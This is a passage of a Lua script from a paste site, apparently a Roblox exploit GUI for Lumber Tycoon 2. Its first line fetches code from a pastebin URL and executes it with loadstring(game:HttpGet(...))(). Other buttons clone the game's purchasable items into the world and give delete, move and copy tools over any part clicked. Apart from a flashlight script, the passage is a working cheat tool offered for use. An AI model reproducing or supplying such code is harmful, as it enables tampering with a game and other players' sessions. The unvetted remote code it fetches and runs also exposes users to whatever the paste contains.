  4746. loadstring(game:HttpGet('https://pastebin.com/raw/nMu90Kdq',true))()
  4747.  
  4748. end)
  4749.  
  4750. FunStuffLEAKED.Name = "FunStuffLEAKED"
  4751. FunStuffLEAKED.Parent = LT2GUI2Frame
  4752. FunStuffLEAKED.BackgroundColor3 = Color3.new(0, 0, 0)
  4753. FunStuffLEAKED.BorderColor3 = Color3.new(0, 0, 0)
  4754. FunStuffLEAKED.Position = UDim2.new(0, 3, 0, 118)
  4755. FunStuffLEAKED.Size = UDim2.new(0, 165, 0, 20)
  4756. FunStuffLEAKED.Font = Enum.Font.Fantasy
  4757. FunStuffLEAKED.FontSize = Enum.FontSize.Size18
  4758. FunStuffLEAKED.Text = "Leaked Items"
  4759. FunStuffLEAKED.TextColor3 = Color3.new(255, 0, 0)
  4760. FunStuffLEAKED.TextSize = 15
  4761. FunStuffLEAKED.MouseButton1Down:connect(function()
  4762. makesound("rbxassetid://156785206")
  4763. game.ReplicatedStorage.Purchasables:Clone().Parent = game.Workspace.PlayerModels
  4764. end)
  4765.  
  4766.  
  4767. FunStuffFLASH.Name = "FunStuffFLASH"
  4768. FunStuffFLASH.Parent = LT2GUI2Frame
  4769. FunStuffFLASH.BackgroundColor3 = Color3.new(0, 0, 0)
  4770. FunStuffFLASH.BorderColor3 = Color3.new(0, 0, 0)
  4771. FunStuffFLASH.Position = UDim2.new(0, 3, 0, 141)
  4772. FunStuffFLASH.Size = UDim2.new(0, 165, 0, 20)
  4773. FunStuffFLASH.Font = Enum.Font.Fantasy
  4774. FunStuffFLASH.FontSize = Enum.FontSize.Size18
  4775. FunStuffFLASH.Text = "Flash Light"
  4776. FunStuffFLASH.TextColor3 = Color3.new(255, 0, 0)
  4777. FunStuffFLASH.TextSize = 15
  4778. FunStuffFLASH.MouseButton1Click:Connect(function()
  4779. makesound("rbxassetid://156785206")
  4780. FunStuffFLASH.BackgroundColor3 = Color3.new(0.14902, 0.490196, 0.109804)
  4781. -- Created by supersonicfan111
  4782. local p=game:GetService"Players".LocalPlayer
  4783. local c=p.Character
  4784. local surf='SmoothNoOutlines'
  4785. if not c then error'Cannot find character, please respawn, then rerun the script' end
  4786.  
  4787. -- Flashlight Handle
  4788. local hand=Instance.new"Part"
  4789. hand.BrickColor=BrickColor.DarkGray()
  4790. hand.Parent=c
  4791. hand.Anchored=false
  4792. hand.Locked=true
  4793. hand.CanCollide=false
  4794. hand.FormFactor='Custom'
  4795. hand.Size=Vector3.new(1,1,2)
  4796. hand.TopSurface,hand.BottomSurface=surf,surf
  4797.  
  4798. -- Torch Effect
  4799. local fe=Instance.new"Part"
  4800. fe.BrickColor=BrickColor.new"Black"
  4801. fe.Parent=c
  4802. fe.Anchored=false
  4803. fe.Locked=true
  4804. fe.CanCollide=false
  4805. fe.FormFactor='Custom'
  4806. fe.Size=Vector3.new(.8,.8,.2)
  4807. fe.TopSurface,hand.BottomSurface=surf,surf
  4808.  
  4809. -- Welding stuff
  4810.  
  4811. -- Flash to Right Arm
  4812. local weld1=Instance.new"Weld"
  4813. weld1.Parent=hand
  4814. weld1.Part0=hand
  4815. weld1.Part1=c['Right Arm']
  4816. weld1.C0=CFrame.new(0, 1.5, 0)
  4817.  
  4818. -- Torch Effect to Flash
  4819. local weld2=Instance.new"Weld"
  4820. weld2.Parent=hand
  4821. weld2.Part0=hand
  4822. weld2.Part1=fe
  4823. weld2.C0=CFrame.new(0, 0, 1)
  4824.  
  4825. -- Right Arm Weld
  4826. local ra=Instance.new"Weld"
  4827. ra.Parent=c['Torso']
  4828. ra.Part0=c['Right Arm']
  4829. ra.Part1=c['Torso']
  4830. ra.C0=CFrame.new(-1.5,1,0)*CFrame.Angles(math.rad(180),0,0)
  4831.  
  4832.  
  4833.  
  4834. -- Flashlight Functionality
  4835.  
  4836. local flashlightOn = false
  4837. local Battery=50
  4838.  
  4839. -- Handles turning the flashlight on/off
  4840. p:GetMouse().Button1Down:connect(function()
  4841. flashlightOn=not flashlightOn
  4842. if flashlightOn then
  4843. fe.BrickColor=BrickColor.new"New Yeller"
  4844. light=Instance.new"SurfaceLight"
  4845. light.Parent=fe
  4846. light.Range=1000
  4847. light.Face="Back"
  4848. light.Brightness=10
  4849. fe.Material="Neon"
  4850. else
  4851. fe.BrickColor=BrickColor.new"Black"
  4852. if light then light:destroy() end
  4853. fe.Material="SmoothPlastic"
  4854. end
  4855. end)
  4856.  
  4857. -- Battery Modules
  4858.  
  4859. -- Depleting and Charging
  4860. spawn(function()
  4861. while wait(1) do
  4862. if flashlightOn then
  4863. if Battery > 0 then
  4864. Battery=Battery-1
  4865. end
  4866. else
  4867. if Battery < 100 then
  4868. Battery=Battery+1
  4869. end
  4870. end
  4871. print(Battery)
  4872. end
  4873. end)
  4874.  
  4875. -- Turning off flashlight if the battery is too low
  4876. spawn(function()
  4877. while wait() do
  4878. if Battery <= 0 then
  4879. flashlightOn=false
  4880. if light then light:destroy() end
  4881. fe.BrickColor=BrickColor.new"Black"
  4882. fe.Material="SmoothPlastic"
  4883. end
  4884. end
  4885. end)
  4886.  
  4887. local stepped = game:GetService'RunService'.RenderStepped
  4888. end)
  4889.  
  4890.  
  4891.  
  4892. DeleteTool.Name = "DeleteTool "
  4893. DeleteTool.Parent = LT2GUI2Frame
  4894. DeleteTool.BackgroundColor3 = Color3.new(0, 0, 0)
  4895. DeleteTool.BorderColor3 = Color3.new(0, 0, 0)
  4896. DeleteTool.Position = UDim2.new(0, 3, 0, 187)
  4897. DeleteTool.Size = UDim2.new(0, 165, 0, 20)
  4898. DeleteTool.Font = Enum.Font.Fantasy
  4899. DeleteTool.FontSize = Enum.FontSize.Size18
  4900. DeleteTool.Text = "Delete Tool"
  4901. DeleteTool.TextColor3 = Color3.new(255, 0, 0)
  4902. DeleteTool.TextSize = 15
  4903.  
  4904. MoveTool.Name = "DeleteTool "
  4905. MoveTool.Parent = LT2GUI2Frame
  4906. MoveTool.BackgroundColor3 = Color3.new(0, 0, 0)
  4907. MoveTool.BorderColor3 = Color3.new(0, 0, 0)
  4908. MoveTool.Position = UDim2.new(0, 3, 0, 210)
  4909. MoveTool.Size = UDim2.new(0, 165, 0, 20)
  4910. MoveTool.Font = Enum.Font.Fantasy
  4911. MoveTool.FontSize = Enum.FontSize.Size18
  4912. MoveTool.Text = "Move Tool"
  4913. MoveTool.TextColor3 = Color3.new(255, 0, 0)
  4914. MoveTool.TextSize = 15
  4915.  
  4916. CopyTool.Name = "DeleteTool "
  4917. CopyTool.Parent = LT2GUI2Frame
  4918. CopyTool.BackgroundColor3 = Color3.new(0, 0, 0)
  4919. CopyTool.BorderColor3 = Color3.new(0, 0, 0)
  4920. CopyTool.Position = UDim2.new(0, 3, 0, 233)
  4921. CopyTool.Size = UDim2.new(0, 165, 0, 20)
  4922. CopyTool.Font = Enum.Font.Fantasy
  4923. CopyTool.FontSize = Enum.FontSize.Size18
  4924. CopyTool.Text = "Copy Tool"
  4925. CopyTool.TextColor3 = Color3.new(255, 0, 0)
  4926. CopyTool.TextSize = 15
  4927.  
  4928. DeleteTool.MouseButton1Down:connect(function()
  4929. makesound("rbxassetid://156785206")
  4930. if BTool == "Delete" then
  4931. BTool = "Nothing"
  4932. DeleteTool.BackgroundColor3 = Color3.new(0, 0, 0)
  4933. else
  4934. BTool = "Delete"
  4935. DeleteTool.BackgroundColor3 = Color3.new(0, 0.5, 0)
  4936. end
  4937. end)
  4938.  
  4939. MoveTool.MouseButton1Down:connect(function()
  4940. makesound("rbxassetid://156785206")
  4941. if BTool == "Move" then
  4942. BTool = "Nothing"
  4943. MoveTool.BackgroundColor3 = Color3.new(0, 0, 0)
  4944. else
  4945. BTool = "Move"
  4946. MoveTool.BackgroundColor3 = Color3.new(0, 0.5, 0)
  4947. end
  4948. end)
  4949.  
  4950. CopyTool.MouseButton1Down:connect(function()
  4951. makesound("rbxassetid://156785206")
  4952. if BTool == "Copy" then
  4953. BTool = "Nothing"
  4954. CopyTool.BackgroundColor3 = Color3.new(0, 0, 0)
  4955.  
  4956. else
  4957. BTool = "Copy"
  4958. CopyTool.BackgroundColor3 = Color3.new(0, 0.5, 0)
  4959.  
  4960. end
  4961. end)
  4962.  
  4963. Mouse.Button1Up:connect(function()
  4964. MDown = false
  4965. end)
  4966.  
  4967. Mouse.Button1Down:connect(function()
  4968. MDown = true
  4969. if BTool == "Copy" then
  4970. if Mouse.Target ~= nil then
  4971. Clone = Mouse.Target:clone()
  4972. Clone.Parent = game.Workspace
  4973. end
  4974. end
  4975.  
  4976. if BTool == "Delete" then
  4977. if Mouse.Target ~= nil then
  4978. Mouse.Target:remove()
  4979. end
  4980. end
  4981.  
  4982. if BTool == "Move" then
  4983. if Mouse.Target ~= nil then
  4984. MoveObject = Mouse.Target
  4985. end
  4986. end
  4987.  
  4988. wait()
  4989. if Clone ~= nil then
  4990. Clone.CanCollide = false
  4991. repeat
  4992. wait()
  4993. SubX = Clone.Size.X/2
  4994. SubY = Clone.Size.Y/2
  4995. SubZ = Clone.Size.Z/2
  4996. Clone.Position = Vector3.new(Mouse.Hit.X - SubX, Mouse.Hit.Y - SubY, Mouse.Hit.Z - SubZ)
  4997. until MDown == false
  4998. Clone.CanCollide = true
  4999. Clone.Position = Clone.Position + Vector3.new(SubX, SubY, SubZ)
  5000. Clone = nil
  5001. end
  5002.  
  5003. if MoveObject ~= nil then
  5004. MoveObject.CanCollide = false
  5005. repeat
  5006. wait()
  5007. SubX = MoveObject.Size.X/2
  5008. SubY = MoveObject.Size.Y/2
  5009. SubZ = MoveObject.Size.Z/2
  5010. MoveObject.Position = Vector3.new(Mouse.Hit.X - SubX, Mouse.Hit.Y - SubY, Mouse.Hit.Z - SubZ)
  5011. until MDown == false
  5012. MoveObject.CanCollide = true
  5013. MoveObject.Position = MoveObject.Position + Vector3.new(SubX, SubY, SubZ)
  5014. MoveObject= nil
  5015. end
  5016. end)
  5017.  
  5018.  
  5019. local Menus = {
  5020. [Player] = PlayerFrame;
  5021. [Teleport] = Waypoints;
  5022. [AIntroImage] = BloodFrameInfo;
  5023. [Woodmenu] = WoodFrame;
  5024. [Copymenu] = CopyFrame;
  5025. [PaintFill] = PaintFills;
  5026. [Artmenu] = ArtFrame;
  5027. [toolamenu] = toolaFrame;
  5028. [Buymenu] = BuyFrame;
  5029. [TpCar] = TpCarFrame;
  5030. [Tptree] = TptreeFrame;
  5031. [Btoolamenu] = LT2GUI2Frame;
  5032. }
  5033. for button,frame in pairs(Menus) do
  5034. button.MouseButton1Click:connect(function()
  5035. if frame.Visible then
  5036. frame.Visible = false
  5037. return
  5038. end
  5039. for k,v in pairs(Menus) do
  5040. v.Visible = v == frame
  5041. end
  5042. end)
  5043. end
  5044.  
  5045.  
  5046. --- Open/Close ---
  5047.  
  5048. function makesound(id)
  5049. local s=Instance.new("Sound",BLOOD)
  5050. s.SoundId=id
  5051. s.Volume=5
  5052. s.PlaybackSpeed=1
  5053. s:Play()
  5054. end
  5055.  
  5056. Open.MouseButton1Click:connect(function()
  5057. makesound("rbxassetid://156785206")
  5058. MainFrame:TweenPosition(UDim2.new(1, -500, 0.7, -210), "Out", "Back",2.5)
  5059. OpenFrame.Visible = true
  5060. MainFrame.Visible = true
  5061. end)
  5062.  
  5063. Minimize.MouseButton1Click:connect(function()
  5064. makesound("rbxassetid://156785206")
  5065. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  5066. wait(2.5)
  5067. MainFrame.Visible = false
  5068. OpenFrame.Visible = true
  5069. end)
  5070.  
  5071. CloseBLOOD.MouseButton1Down:connect(function()
  5072. makesound("rbxassetid://156785206")
  5073. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  5074. wait(2.5)
  5075. BLOOD:destroy()
  5076. end)
  5077.  
  5078. --bring up menu
  5079. CurrentItem.MouseButton1Click:Connect(function()
  5080. if Picker.Visible == false then
  5081. Picker.Visible = true
  5082. else
  5083. Picker.Visible = false
  5084. end
  5085. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement